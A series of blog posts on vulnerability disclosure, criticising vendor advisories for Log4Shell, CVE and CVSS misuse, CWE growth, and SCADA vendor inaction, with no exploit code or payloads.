Log4Shell: Redefining Painful Disclosure

Log4Shell is yet another example of why we simply don’t get security right, and it strongly suggests there is little hope for change. There are plenty of blogs and articles that do a great analysis of the vulnerability from the exploitation and impact angle of this vulnerability. There are a lot fewer that examine why the bug exists in the first place, and why it took so long to notice. I’ll briefly touch on that and then look at log4shell from a bigger picture in the context of vendor responses and how they show all the chinks in the armor, enough to demonstrate that we don’t really have a set of armor at all.

If you are familiar with Log4Shell, you may want to skip the next two paragraphs, but part of the abridged summary spells out some CVE assignment confusion and explains how this blog will refer to the various issues.

What is Log4Shell? (Abridged)

On November 30, 2021, a vulnerability was made public in the Apache Log4j library that affected version 2.x but not 1.x. This is largely because, despite the same name, Log4j 2.x represents a complete rewrite of the Log4j 1.x codebase. For ease, I will refer to the library as Log4j in this blog but specifically mean the 2.x version.

The gist of the vulnerability is that when the Log4j library receives user-supplied input, it not only logs the information but has the ability to perform lookup actions. This can result in the execution of arbitrary code. Since logging is frequently implemented in a way to receive user-supplied input, this can represent a significant issue and allow for a trivial compromise of the system. In large enterprises, these logs can be automatically forwarded and consolidated on logging hosts that make administrative work easier. So that simple remote code execution might impact a different system than the one you intended.

The vulnerability was originally assigned CVE-2021-44228 but the initial fix was found to be incomplete. This led to a second CVE assignment, CVE-2021-45046, that immediately started being confused with a very separate issue affecting Log4j 1.x only, and only if the attacker had privileged access to begin with (CVE-2021-4104). Red Hat assigned CVE-2021-4125 to represent the original vulnerability but as applied to their specific products, which is in violation of CVE Numbering Authority (CNA) rules. To add more confusion, the second attempt to fix the original vulnerability resulted in a distinct vulnerability being discovered that resulted in a denial of service and assigned CVE-2021-45105. Finally, yet another flaw was discovered but it too required privileged local access, despite being called “remote” by many, and it was assigned CVE-2021-44832.

This blog will generally talk about the original vulnerability (2021-44228) unless stated otherwise and will be referred to by its nickname “Log4Shell”. Note that while the vulnerability was technically made public on November 30 and the vendor patched it on December 6, it was not widely covered until December 10th.

Log4j History (Abridged)

First, let’s look at a slightly different history of high-risk log4j vulnerabilities, including this one. This will become important in subsequent sections. Note that the severity scores represented are CVSSv2. 

There are three more Log4j vulnerabilities, all without a CVE ID, but scored below 6.9 CVSSv2. On top of CVSS scores, it is also important to note that the current Log4j vulnerability (2021-44228) has been scored CVSSv2 10.0 / CVSSv3 10.0 by NVD. This, along with many other scores, is not correct as they fall into many traps that all stem from not following the CVSS specifications. As VulnDB notes, based on RBS Chief Research Officer Carsten Eiram’s analysis:

The CVSS score for this entry has been updated to reflect adherence to the CVSS scoring guidelines. On the surface this appears to be a CVSSv2 10.0 / CVSSv3 10.0 issue, as reflected in NVD and briefly by RBS. In some scenarios this is an accurate score, in others they are not. However, scoring must be done based on Log4j and the context it runs in, not speculation on possible use-case scenarios. The base score reflects that, and CVSS environmental scores allow an organization to re-cast the score based on their specific environment. So if e.g. a web server is passing user-controlled content to the logs which are then forwarded to a logging host, that represents a scope change and would get scored MS:C. Since Log4j is a library, it would have to be configured / implemented in such a way as to allow user-controlled strings which warrants Access Complexity Medium (AC:M) for CVSSv2, leading to a 9.3 score. In this case, AC:M is used for just that and does not represent user interaction required, which is often what AC:M designates. As always for libraries, they can only be scored for that *one* product, the library itself. All the products bunding the library will be affected in a myriad of ways that result in different scores, and organizations will have to tweak those scores depending on their individual configurations. A re-based score may be derived for different business units or applications even, depending on the organization’s security workflow.

Carsten Eiram, Chief Research Officer, Risk Based Security

This same scoring issue can be seen with NVD and CVE-2019-17571 (v2 7.5 / v3 9.8) as well as NVD’s score for CVE-2017-5645 (v2 7.5 / v3 9.8). The discrepancy between the v2 and v3 scores immediately stand out since their v2 score assumes the library runs with lower privileges (C:P/I:P/A:P) while their v3 score reflects that it may run with higher privileges (C:C/I:C/A:C). NVD’s scoring of Log4j issues giving it a 10 / 10 score does not follow specifications and the v3 score is scored (scope changed) with specific scenarios in mind that are not default. 

Regardless of these scores, 2021-44228, 2019-17571, and 2017-5645 should all be treated equally as serious until an organization determines how it impacts them. In reality? That isn’t the case and it doesn’t make sense, other than the fact that news, researchers, and vendors all cried out that this one is “critical” while the previous vulnerabilities were largely ignored. Very similar to the Struts-Shock vulnerability which made the news primarily because it was used to breach Equifax, while other Apache Struts vulnerabilities didn’t enjoy any attention. Perhaps if the other 21 remote code execution vulnerabilities in Struts had names they too would be better known?

Vendor Disclosure Disappointment

This Log4j vulnerability stands apart from prior issues in the library, even ones with the same severity. We see vendor’s publish advisories calling it a “global event” and that it is “industry-wide“, using language that seems to convey that being vulnerable “couldn’t be helped, it affects everyone!” Sure? While that may be true it begs the question why we see them publish an advisory for Log4Shell but not prior vulnerabilities. In other cases, a vendor may definitively (and ironically)  say that it “affects all service providers using the Log4J Java library” which is also untrue while also saying it “affects certain applications and services” of theirs. This is in addition to a staggering number of vendors publishing advisories saying they are not impacted by the vulnerability, something we have never seen at this volume. Of course, I have to mention the vendors that are “quickly working to assess any potential impact to our clients and the company” … three weeks later.

[1/8/2022 Next two paragraphs updated, thanks to L.P. for the pointer on origin of “LogJam” confusion.]

Despite not being the researchers to discover this vulnerability, LunaSec was one of the first to write an easy-to-digest blog explaining the issue. This is valuable to many administrators that need to quickly understand the risk. However, LunaSec decided to name the vulnerability despite not finding it. They chose “logjam” for the name, oblivious to the fact that Logjam was the name given to the “Diffie–Hellman Key Exchange DHE_EXPORT Cipher Handling Downgrade MitM Weakness” vulnerability back in 2015. That vulnerability didn’t fly under the radar by any means; consider that VulnDB has over 1,000 references for it, meaning many hundreds of vendors wrote advisories and patched it in their software. LunaSec apparently had no knowledge of this vulnerability and didn’t do a simple search for the name before using it. This is amateur hour, extremely counter-productive, and introduces serious confusion around the vulnerability.

Vendors that don’t publish advisories frequently are also more prone to make simple mistakes that introduce confusion. Take Pandora FMS or Kiteworks for example, who conflated Log4Shell with Logjam, no doubt because they saw LunaSec call it that. The two issues are extremely different. One is in Apache’s Log4J library and the other in the Diffie–Hellman Key Exchange that requires a privileged network position to intercept traffic. But this mistake isn’t just the domain of those new to security advisories as Micro Focus has decades of sharing vulnerability information, typically in changelogs instead of formal advisories, made the same mistake. You might chalk this up to a simple error, but remember that Micro Focus wrote at least five advisories referencing LogJam. [1] [2] [3] [4] [5]

For those using CVE IDs to track this vulnerability it can get confusing. Log4Shell has three associated CVE IDs: the original (2021-44228), the incomplete fix (2021-45046), and a duplicate assignment from a CNA (2021-4125). Then we have waves of incorrect CVE IDs being used, typically transposed number typos. This may cause someone to think there is yet another Log4J vulnerability though, or cause them to miss an advisory as they are searching for the correct CVEs. We can see some examples from researchers (2021-4438), bloggers and universities (2021-44248), companies (2021-44248), security news (2021-44882), vendors (2021-45056), security companies (2021-44226) and likely more variations. There are more incorrect CVE IDs attributed to this vulnerability than correct ones.

In many cases, it is the first time we see an advisory from hundreds of companies, despite them  “caring deeply” and “taking your security seriously“. Yes, they responded quickly to this vulnerability, but why not the rest? Why aren’t there advisories on any of the vulnerabilities specific to your code? Why no advisories about other third-party library vulnerabilities? It only proves they didn’t care about all the prior vulnerabilities because there simply wasn’t the same level of public attention. They don’t care enough to let you know of the risk of dozens or hundreds of other vulnerabilities, but somehow they “deeply care“.

Dozens of vendors are publishing advisories that are only available to paying customers. When a vendor publishes behind a paywall it makes it difficult for many teams to access that information. While Alice and Bob from the security team may have access, Christine, Dave, Eve, and Frank may not. In other cases the IT/networking team may have access to the account in order to download new firmware, but the security team does not. Those restricted advisories also stay out of reach of third parties that aggregate that information, many of which are retained to provide vulnerability intelligence to the mutual customer. These companies don’t want to check hundreds of vendors for security updates every day; they want someone else to. 

This also applies to vendors that say they will contact customers directly who require updates or publish an anemic advisory saying you need to contact customer service or “contact our support department for product-specific questions“. In many cases those notifications are not going to the appropriate people. Some accounts are set up by different divisions or managers that handle vendor accounts. In other cases there is employee turnover so that vendors are contacting people who left the company.

There are vendors that may understand the issue, may respond accordingly, but turn around and do not communicate that well to customers. For example, L-Soft’s advisory says that one version of their software uses Log4j 2.15.0 “and is therefore not vulnerable to CVE-2021-44228 (Log4Shell) but may still be vulnerable to CVE-2021-45046 and CVE-2021-45105“. This is incorrect, as 2.15.0 is vulnerable to Log4Shell in many instances. If it doesn’t affect them due to configuration then the advisory should specifically say that.

How and where vendors choose to disclose can also prove to be problematic. Modern large organizations may literally use products and services from thousands of vendors. That is why they don’t want to try to monitor them all for security updates, and it is easy to understand why. In addition to monitoring vendor security advisories, knowledge bases, wikis, support forums, and email distributions, some vendors opt to disclose elsewhere. In the case of Log4Shell, we’re seeing that happen on Twitter and Reddit

In other cases we are seeing “advisories” being shared on GitHub in an image (PNG), which doesn’t let you cut & paste the text. When the article isn’t in your native language, it’s basically worthless since you can’t trivially translate it. It reminds me of vendors that publish changelogs or advisories in PDF format, but have disabled the copy & paste functionality in it. 

The researcher SwitHack has done an incredible job collecting vendor advisories related to Log4Shell, but in doing so, has created a similar situation where disclosures happen in comments to their Gist. This collection of references also highlights the problem of “linkrot”; when a link goes 404 and the content is moved or removed completely. It’s been less than one month and half a dozen references are already 404. Some vendors publish their advisory in a place that almost guarantees it will move or vanish in time.

For those who rely on the version of software to track vulnerabilities, this is typically the best approach. In some cases, vendors work against your efforts when they say “The following product IS affected: AppDev Pack versions 1.0.5 – 1.0.11” and then “As of this writing the latest release of AppDev Pack, version 1.0.11, updates the referenced version of log4j2 to 2.15.0.” In this case, not only do you have to download the same version of the software as of a given date, you are still not protected weeks later because it only updates Log4J to 2.15.0 instead of 2.17.0 which resolves all of the known issues.

There is another type of vendor that likes conveying information in tables. For some data that is great, but for vulnerability information it can often be more difficult to process. Solace decided to share their matrices in image format that are basically unreadable as is. You have to copy the image URL and load it in a new tab to read it, since they aren’t even clickable links. HCL Technologies gives us one table to decipher, a word I use with reason. This handy table will let you figure out if you are impacted:

When it comes to clarity in vulnerability disclosure it can be tricky in a case like Log4Shell, given it has three CVE IDs and additional vulnerabilities were discovered within days of the original disclosure. However, when a vendor references three CVE IDs for Log4J vulnerabilities and then decides to also include a 2018 vulnerability in Log4Net, which is not affected by the Log4Shell issue, it can introduce confusion. Specific to Log4J, some of the initial confusion came in the form of version 1.x versus 2.x. While they share the same name, Log4J, version 2.x was a complete rewrite of 1.x and doesn’t share much beyond the name. Given that several vulnerabilities do not affect 1.x while one vulnerability affects 1.x and not 2.x, it’s messy. So a vendor responding to the Log4Shell vulnerability (in 2.x) proudly saying something like “We’re not vulnerable, we use 1.x!” and then not mentioning if they are impacted by CVE-2021-4104 (in 1.x) is frustrating.

If all of this seems discouraging and you better appreciate some frustrations around vulnerability intelligence, consider this; not even the vendor, Apache, gets it right. Three weeks after Log4Shell was disclosed, the Apache blog aggregating information about their own products is missing information (Daffodil, HBase, ManifoldCF, etc.) and incorrect about some (Geode, Jena, etc.).If the vendor can’t aggregate accurate and timely information on their own product portfolio, what hope do the rest of us have?

Keeping Up

As you can see from the ‘Disclosure Disappointments’ above, trying to stay current with the Log4Shell vulnerability is a nightmare. VulnDB is currently cataloging over 1,100 vendor advisories in addition to vendor specific solution references, exploits, and a wide variety of additional references. In less than 30 days, VulnDB 275958 (Log4Shell) has more references than Spectre, Meltdown, SWEET32, SLOTH, FREAK, Shellshock, Heartbleed, and Logjam. The only vulnerability with more references right now is POODLE, but that is likely to change in the coming weeks as more vendors finally publish their advisories.

Every day the VulnDB team continues to scour vendor web sites, Twitter, GitHub, and other sources looking for more information. When a new advisory is found we have to determine if any information needs to be cataloged and update the entry accordingly. Consider adding one reference or one vendor/product/version combination or updating one field as a single data point, and imagine what that looks like. As of this blog, that is 9,749 points of data which is staggering for one vulnerability, especially for one published less than a month ago. Here’s what that looks like:

You can see when the news sank in and vendors really started responding to it. For the next half year or more, that entry will keep getting updated. For those who think that managing a vulnerability database is “just collecting public information“, you are right. But summiting Mount Everest is also just “walking up that hill“.

What can you do? The customers have the power here. If your vendor releases a poorly worded advisory, or this is their very first advisory, take them to task. You must hold them accountable and be ready to switch vendors, which is painful I know, so that your money can teach them a lesson. Demand not only better security practices from your vendors, but better communication about vulnerabilities that impact you. Unfortunately, that threat of switching vendors is typically an empty one, and vendors know it.

Based on everything above, enumerating many of the failures around disclosing a single vulnerability, it’s hard to imagine our industry has much hope. How can organizations really expect to maintain security in the face of vendors that say they care, but act otherwise? Vendors and the information security sector are expected to provide a level of defense that will repel attackers. Unfortunately, we’re our own worst enemy and the staggering number of data breaches are evidence of that. But hey, at least we put on a good show.

A critique of the summary of “Latent Feature Vulnerability Rankings of CVSS Vectors”

Update: Corren McCoy has written a wonderful response to this blog where she goes into more detail about her conclusions as well as citing more portions of the original research that led to her conclusions. As she notes, there are several layers of condensing the original research at play here, which can dilute and distort the original research. In her follow-up she breaks down each of these areas that I address below. If you continue reading my blog below, please read her reply after to get a better picture. Thank you!

What do you think of this?” It always starts out simple. A friend asked this question of an article titled Summary of “Latent Feature Vulnerability Rankings of CVSS Vectors”. This study is math heavy and that is not my jam. But vulnerability databases are, and that includes the CVE ecosystem which encompasses NVD. I am also pretty familiar with limitations of the CVSS scoring system and colleagues at RBS have written extensively on them.

I really don’t have the time or desire to dig into this too heavily, but my response to the friend was “immediately problematic“. I’ll cliff notes some of the things that stand out to me, starting with the first graphic included which she specifically asked me about.

  • The header graphic displays the metrics for the CVSSv3 scoring system, but is just labeled “CVSS”. Not only is this sloppy, it belies an important point of this summary that the paper’s work is based on CVSSv2 scores, not CVSSv3. They even qualify that just below: “We should note the analysis conducted by Ross et al. is based upon the CVSS Version 2 scoring system…
  • Ross et al. note that many exploits exist without associated CVE-IDs. For example, only 9% of the Symantec data is associated with a CVE-ID. The authors offered additional caveats related to their probability calculation.” That sounds odd, but it is readily explained above when they summarize what that data is: “Symantec’s Threat Database (SYM): A database extracted from Symantec by Allodi and Massacci that contains references to over 1000 vulnerabilities.” First, that data set contains a lot more than vulnerabilities. Second, if Symantec is really sitting on over 900 vulnerabilities that don’t have a CVE ID, then as a CNA they should either assign them an ID or work with MITRE to get an ID assigned. Isn’t that the purpose of CVE?
  • Ross et al. use four datasets reporting data on vulnerabilities and CVSS scores…” and then we see one dataset is “Exploit Database (Exploit-DB): A robust database containing a large collection of vulnerabilities and their corresponding public exploit(s).” Sorry, EDB doesn’t assign CVSS scores so the only ones that would be present are ones given by the people disclosing the vulnerabilities via EDB, some of whom are notoriously unreliable. While EDB is valuable in the disclosure landscape, serving as a dataset of CVSS scores is not one of them.
  • About 2.7% of the CVE entries in the dataset have an associated exploit, regardless of the CVSS V2 score.” This single sentence is either very poorly written, or it is all the evidence you need that the authors of the paper simply don’t understand vulnerabilities and disclosures. With a simple search of VulnDB, I can tell you at least 55,280 vulnerabilities have a CVE and a public exploit. There were 147,490 live CVE IDs as of last night meaning that is almost 38% that have a public exploit. Not sure how they arrived at 2.7% but that number should have been immediately suspect.
  • In other words, less than half of the available CVSS V2 vector space had been explored despite thousands of entries…” Well sure, this statement doesn’t qualify one major reason for that. Enumerate all the possible CVSSv2 metric combinations and derive their scores, then look at which numbers don’t show up on that list. A score of 0.1 through 0.7 is not possible for example. Then weed out the combinations that are extremely unlikely to appear in the wild, which is most that have “Au:M” as an example, and it weeds out a lot of possible values.
  • Only 17 unique CVSS vectors described 80% of the NVD.” Congrats on figuring out a serious flaw in CVSSv2! Based on the 2.7% figure above, I would immediately question the 80% here too. That said, there is a serious weighting of scores primarily in web application vulnerabilities where e.g. an XSS, SQLi, RFI, LFI, and limited code execution could all overlap heavily.
  • Input: Vulnerabilities (e.g., NVD), exploit existence, (e.g., Exploit-DB), the number of clusters k” This is yet another point where they are introducing a dataset they don’t understand and make serious assumptions about. Just because something is posted to EDB does not mean it is a public exploit. Another quick search of VulnDB tells us there are at least 733 EDB entries that are actually not a vulnerability. This goes back to the reliability of the people submitting content to the site.
  • The authors note their approach outperforms CVSS scoring when compared to Exploit-DB.” What does this even mean? Exploit-DB does not do CVSS scoring! How can you compare their approach to a site that doesn’t do it in the first place?

Perhaps this summary is not well written and the paper actually has more merit? I doubt it, the summary seems like it is comprehensive and captures key points, but I don’t think the summary author works with this content either. Stats and math yes. Vulnerabilities no.

More authorities, more CVEs; Oh, and more commentary.

On November 10, TechBeacon published a great article by Rob Lemos titled “More authorities, more CVEs: What it means for app sec teams” in which I was quoted, along with several other people.

Like many articles of this nature, those who provide input often will talk for as long as half an hour and ultimately get a couple lines quoted. We do it to provide background and context on the topic as well as have an open discussion on vulnerability trends. That means there are ‘outtake’ opinions and facts, as well as our potential reaction to other parts of the article that did not include our input. So this blog just covers some of my random observations to compliment the article.

Until 2016, more than 80% of software security issues assigned a CVE identifier belonged to only 10 classes, or weaknesses, as classified by their Common Weakness Enumeration (CWE) category. But in 2019, the top 10 weaknesses only accounted for 59% of reported vulnerabilities.

The Common Weakness Enumeration (CWE) index is interesting to me and I wonder if it has gotten so big to degrade its value. Consider that there are now 891 CWE identifiers as of August 20 in version 4.2 of the framework. Per the article, only 10 of them account for 59% of vulnerabilities which will no doubt include XSS, SQLi, and CSRF as examples. That makes me wonder the value of abstracting so much as it means that hundreds of those CWEs will represent a handful of vulnerabilities at most.

Digging into the 2,298 page PDF documenting version 4.2, you can jump toward the end of the CWE list and see that several have been created but have no “Observed Examples”. In fact, searching for that phrase only yields 397 hits. Does that mean that out of 891 CWE IDs representing weaknesses, that MITRE has only come up with 397 that match known vulnerabilities? I certainly expect otherwise and hope this is just documentation shortcoming as I feel that every CWE ID should be linked to a concrete real-world example. I’d love to see

I’d love to see a simple breakdown of the top 100 CWE along with how many vulnerabilities are associated with them (via NVD, since MITRE doesn’t actually apply CWE to entries) and what percentage of the overall vulnerabilities that represents. It might be very telling just how useful CWE is and if the project is being pushed too heavily from an academic standpoint. Before you judge that comment, let me know how useful this CWE report from MITRE is, and make sure you load it in Chrome.

It’s an open question whether the addition of coding repositories will lead to another expansion in the number of vulnerabilities.

I don’t think that is an open question at all. I think the number of vulnerabilities will go up as a result of more coding repositories becoming a CNA. But that isn’t really the issue here. Instead, the real questions should be centered around what quality of CVE entries they will provide, if they will adhere to CNA standards, and if MITRE will enforce CNA policy on them.

Based on history, the short answers to those questions are: quality will go down, no, and no. As soon as MITRE provides a breakdown of how many IDs were published by each CNA it is difficult to know. Speaking of, why hasn’t MITRE published such statistics? Rhetorical question, apologies.

Open source vulnerabilities: Do you know what’s in your software?

I, along with many others, can’t stress this enough! Please make sure you understand what third-party software your developers are using. This affects your organizations from both a vulnerability standpoint, as well as legal accountability. Using a third-party library against its license could open you up to some hardships.

The only reason I quoted this section is because I just read an article in the latest Wired that mentions Bootstrap is thought to be used on nearly 20% of all web sites across the Internet. That is incredible.

Patch Tuesday is becoming a bottleneck

There is a lot more that can be said on this topic. It reminds me of a 2015 blog I wrote that actually goes back farther to 2007 where this problem was predicted long before the nightmare IT teams experience once a month. It’s only going to get worse as more vendors jump on this patch schedule and the only ones who will suffer are their paying customers. But hey, let’s let them keep using the term “responsible” disclosure too.

But exploitability alone doesn’t solve the problem—three quarters of the 17,300 vulnerabilities identified ranked CVSS exploitability rating of 8.0 or higher.

I’m not sure a more perfect example of why CVSS has become worthless exists. On its own, especially using the Base score only, is it really helpful that so many vulnerabilities are ‘High Risk‘? This is also a good reminder of another blog I have been meaning to write for a while that outlines the distribution of CVSSv2 versus CVSSv3 and how it impacts scoring. With a couple charts you will get a nice visual of just how poorly thought out some of the framework was. Of course, this has already been evaluated by others years back as well.

Finally, because I don’t hold the copyright to the picture used in the TechBeacon article header, I offer my version:

Picture of me by D2d in November, 2018 at Tomayo, in Denver, CO.

Why @anacondainc Doesn’t Fully Understand CVEs

It’s worrisome that in 2020 we still have people in influential technical roles that don’t understand CVE. A friend told me earlier this year he was in a meeting where someone said that CVE IDs are assigned in order, so CVE-2020-9500 meant there were 9500 vulns in 2020 so far. Of course that is not how it works and a dangerous understanding of CVE.

I ran across an article written by Nick Malkiewicz of Anaconda titled “Why Understanding CVEs Is Critical for Data Scientists“. This article has several bits that show a lack of understanding of what CVE is. One of the biggest is equivocating a CVE with a vulnerability. Yes, many vulnerabilities directly map to a single CVE identifier, but a CVE is the identifier not the vulnerability. Additionally, sometimes one vulnerability can track with multiple CVE IDs, or one CVE ID can track to multiple vulnerabilities. So lines like the following are concerning:

When someone finds a CVE, they report it to a CVE Numbering Authority (CNA).

When someone finds a vulnerability, they report it to MITRE or a vendor, who may be a CNA but more often not one. That vendor can then ask MITRE for an ID via a web form.

CNAs assign identification numbers to CVEs and list them in publicly accessible databases.

A CNA is required to inform MITRE after a CVE-assigned vulnerability has been disclosed. That is actually a fairly recent rule, implemented in the last few years. For most of CVE’s history there was no requirement or specific communication channel for a CNA to notify MITRE of this. That was one of many failings of the CVE ecosystem and directly led to companies being breached, as they relied on CVE to be ‘complete’ and timely.

Each vulnerability listed in a CVE database has a score from .1 to 10, 10 being the highest risk level. These scores are based on exploitability, impact, remediation level, report confidence, and other qualities.

Technically, not even the first line is true as NVD can score a vulnerability as 0.0, meaning it is not a vulnerability and poses no risk. This occurs when a researcher or vendor disclose a vulnerability but don’t fully understand the issue or the subsequent impact. This happens hundreds of times a year although many are not included in NVD. The second sentence from Anaconda is also incorrect as NVD only scores CVSS Base scores. The exploitability, remediation level, and report confidence are part of Temporal scores and not included. You can see an example with CVE-2020-2800 published by Oracle and given a CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N score by both Oracle and NVD. This misunderstanding of NVD CVSS scoring is more baffling as Anaconda links to the same FIRST CVSS document I do in this paragraph.

Anaconda goes on talking about how there are other factors at play including looking at the history of a package, how fast vendors respond, and more. This is great advice and critical for companies facing tens of thousands of vulnerabilities a year. Unfortunately, they slide into the “more lipstick on that pig” problem:

The good news is, there are tools that automate the CVE monitoring process.

This is true. But, more ways to manipulate bad data still leaves you with bad data. In addition to CVE missing several thousand vulnerabilities a year, their push for quantity in the last few years have led to a serious hit on quality. There are some CVE IDs that have descriptions missing critical information like the vendor, affected version, or impact. All the data wrangling and fancy analysis of that data is still based on bad or incomplete information. All the lipstick on that pig still makes it a pig.

Finally, I will quote on other line from their blog that is curious:

Hacking open-source software also has a bigger payoff because many more people use it.

I understand and appreciate the sentiment, and finding a vulnerability in a library like OpenSSL obviously has a huge impact. However, that and a couple dozen libraries are still the outliers in the bigger picture. Compare your vulnerabilities like EternalBlue to a standard open source library vulnerability and they are not even close as far as how “many more people use it”.

The problem with SCADA goes deeper…

[This was originally published on the OSVDB blog.]

We know SCADA is virtual swiss cheese, ready to be owned if someone can reach a device. We have preached airgaps for decades, even before we knew how bad the software was. Back then it was just, “this is so critical, it has to be separate!”

The last five years have proven how bad it is, with the rise of SCADA vulnerabilities. Sure, we can overlook the bad coding, proprietary protocols, no evidence of a SDLC, and the incredible amount of time it can take to patch. For some silly reason we put up with “forever-day bugs” because something is so critical it can’t be rebooted (forgetting how absurd that design choice is). But, what if we go a step beyond that?

An ICS-CERT 14-084-01 advisory released yesterday on vulnerabilities in Festo products is a good reminder of just how bad the problem is, and how much deeper it goes. First, the product has a backdoor in the FTP service allowing unauthenticated access (CVSSv2 9.3). This can allow a remote attacker to crash the device or execute arbitrary code. Second, the device is vulnerable due to bundling the 3S CoDeSys Runtime Toolkit which does not require authentication for admin functions (CVSSv2 10.0), and a traversal flaw that allows file manipulation leading to code execution (CVSSv2 10.0). Those two issues were reported in January of 2013, making this report as relates to Festo products over a year late.

So we have a vendor backdoor, unauthenticated administrator access, and a way to bypass authentication if it was there to gain privileges. So realistically, what type of organizations does this potentially impact? From the ICS-CERT advisory:

This product is used industrywide as a programmable logic controller with inclusion of a multiaxis controller for automated assembly and automated manufacturing. Identified customers are in solar cell manufacturing, automobile assembly, general assembly and parts control, and airframe manufacturing where tolerances are particularly critical to end product operations.

Now to dig the hole deeper. Under the “Mitigation” section, we see how serious Festo considers these vulnerabilities. Paraphrased from two lines in the advisory:

Festo has decided not to resolve these vulnerabilities, placing critical infrastructure asset owners using this product at risk … because of compatibility reasons with existing engineering tools.

The two 3S CoDeSys vulnerabilities have a fix available and just need to be integrated into the Festo products. What does “compatibility with existing engineering tools” really mean in the context of software? The ICS-CERT advisory also says:

According to the Festo product web page, other products are using newer versions of CoDeSys software and may not be vulnerable to the CoDeSys vulnerability, but this has not been evaluated by the researcher.

The researcher already spent time finding the issues, reporting them to a coordinating body, and following coordinated disclosure practices. Expecting them to also evaluate which products are not vulnerable is ridiculous. This is a case of the vendor just being lazy and irresponsible.

A company that makes vulnerable critical components that affect our infrastructure and directly impact our safety, but refuses to fix them. Why is this allowed to exist in our society?


Mobile Devices and Exploit Vector Absurdity

[This was originally published on the OSVDB blog.]

The last few days has seen several vulnerabilities disclosed that include serious gaps in logic with regard to exploitation vectors. What is being called “remote” is not. What is being called “critical” is not. Here are a few examples to highlight the problem. We beg of you, please be rational when explaining vulnerabilities and exploit chaining. The biggest culprit in all of this is the “need for a user to install a malicious app” to then allow a vulnerability to be exploited. Think about it.

Number One

We start with an H-Online article titled “Critical vulnerability in Blackberry 10 OS“. First word, critical. In the world of vulnerabilities, critical means a CVSSv2 score of 10.0 which essentially allows for remote code execution without user interaction. Consider that standard and widely accepted designation, and read the article’s summary of what is required to exploit this vulnerability:

As well as needing Protect enabled, the user must still install a malicious app, which then compromises a Protect-component so that it can intercept a password reset. This password reset requires the user, or someone who knows the BlackBerry ID and password, to go to the web site of BlackBerry Protect and request the password. If the attacker manages that, then the Protect component, compromised by the earlier malicious app, can let the attacker know the new password for the device. If he has physical access to the device, he can now log on successfully as the actual user. Otherwise, the attacker can only access Wi-Fi file sharing if the actual user has activated it.

The only thing missing from this exploit chain are the proverbial chicken sacrifices at midnight on a full blue moon. Want to get the same result much easier? Find your victim and say “Wow, that is a slick new phone, can I see it?” Nine out of ten times, they unlock the phone and hand it to you. Less work, same result.

Number Two

There were a few disclosures out of Japan’s JVN system, run by JPCERT. Two examples, both the same fundamental vulnerability, are summarized below:

#1 – CVE-2013-3643 (NVD Entry) – JVN 99813183 / JVNDB-2013-000056
#2 – CVE-2013-3642 (NVD Entry) – JVN 79301570 / JVNDB-2013-000055

#1 – The Galapagos Browser application for Android does not properly implement the WebView class, which allows attackers to obtain sensitive information via a crafted application.

Despite all these references, users are left with either incorrect or very misleading information. First, CVE says “an attacker” instead of qualifying it as a local attacker. I only call them out because they are historically more precise than this. Second, NVD calls this a “context-dependent” attacker via the CVSSv2 score (AV:N/AC:M/Au:N/C:P/I:N/A:N), saying it can be exploited over the network with moderate user interaction. NVD also says this affects confidentiality ‘partially’. JVN goes so far to say it can be exploited “over the Internet using packets” with “anonymous or no authentication”.

The Reality

The reality of these vulnerabilities is that they are not remote. Not in any form under any circumstances that the vulnerability world accepts. For some reason, VDBs are starting to blur the lines of exploit traits when it comes to mobile devices. The thought process seems to be that if the user installs a malicious application, then the subsequent local vulnerability becomes ‘remote’. This is absurd. Just because that may be the most probable exploit vector and chaining, does not change the fact that getting a user to install a malicious application is a separate distinct vulnerability that cannot have any scoring weight or impact applied to the vulnerability in question. If you can get a phone user to install a malicious application, you can do a lot more than steal ‘partial’ information from the one vulnerable application.

Let me put it to you in terms that are easier to understand. If you have a Windows local privilege escalation vulnerability, it is local. Using the above logic, if I say that by tricking a user into installing a malicious application it can then be exploited remotely, what would you say? If you have a Linux Kernel local DoS, it too can become remote or context-dependent, if the root user installs a malicious application. You can already spin almost any of these local vulnerabilities into remote by saying “remote, authentication required” and assuming it can be done via RDP or SSH. To do so though, devaluates the entire purpose of vulnerability classification.

Any doubts? Consider that CVE treats the exact same situation as the mobile browser vulnerabilities above as a local issue in Windows, even when a “crafted application” is required (see IDs below). The only difference is if the local user writes the application (Windows), or gets the user to install the application (Mobile). Either way, that is a local issue.


CVSSv2 Shortcomings, Faults, and Failures Formulation

[This was originally published on the OSVDB blog.]

The Open Security Foundation (OSF) and Risk Based Security wrote an open letter to FIRST regarding the upcoming Common Vulnerability Scoring System (CVSS) version 3 proposal. While we were not formally asked to provide input, given the expertise of managing vulnerability databases, along with the daily use of CVSS, we felt the feedback would provide valuable insight to improve CVSS in the future.

Some of the areas discussed include:

  • Introducing 4 levels for granularity
  • Better definitions for terminology for more accurate scoring
  • Re-examining the pitfalls of “Access Complexity”
  • Limitations of the current Access Vector breakdown
  • The challenge of scoring authentication
  • And a variety of other considerations to improve vulnerability scoring

Our conclusion points to the need for CVSS to be overhauled as CVSSv2 has too many current shortcomings to provide an adequate and useful risk scoring model. You can download the full letter in PDF format.

Advisories != Vulnerabilities, and How It Affects Statistics

[This was originally published on the OSVDB blog.]

I’ve written about the various problems with generating vulnerability statistics in the past. There are countless factors that contribute to, or skew vulnerability stats. This is an ongoing problem for many reasons. First, important numbers are thrown around in the media and taken as gospel, creating varying degrees of bias in administrators and owners. Second, these stats are rarely explained to show how they were derived. In short, no one shows their work, shows potential bias, caveats, or other issues that should be included as a responsible security professional. A recent article has highlighted this problem again. To better show why vulnerability stats are messy, but important, I will show you how it is trivial to skew numbers simply by using different criteria, along with several pitfalls that must be factored into any set of stats you generate. The fun part is that the word used to describe the differences can be equally nebulous and they are all valid, if properly disclaimed!

I noticed a Tweet from SC Magazine about an article titled “The ghosts of Microsoft: Patch, present and future”. The article is by Alex Horan, security strategist, CORE Security and discusses Microsoft’s vulnerabilities this year. Reading down, the first line of the second paragraph immediately struck me as being incorrect.

Based on my count, there were 83 vulnerabilities announced by Microsoft over the past year. This averages out to a little more than six per month, a reasonable number of patches (and reboots) to apply to your systems over the course of a year.

It is difficult to tell if Horan means “vulnerabilities” or “patches”, as he appears to use the same word to mean both, when they are quite different. The use of ’83’ makes it very clear, Horan is referencing Microsoft advisories, not vulnerabilities. This is an important distinction as a single advisory can contain multiple vulnerabilities.

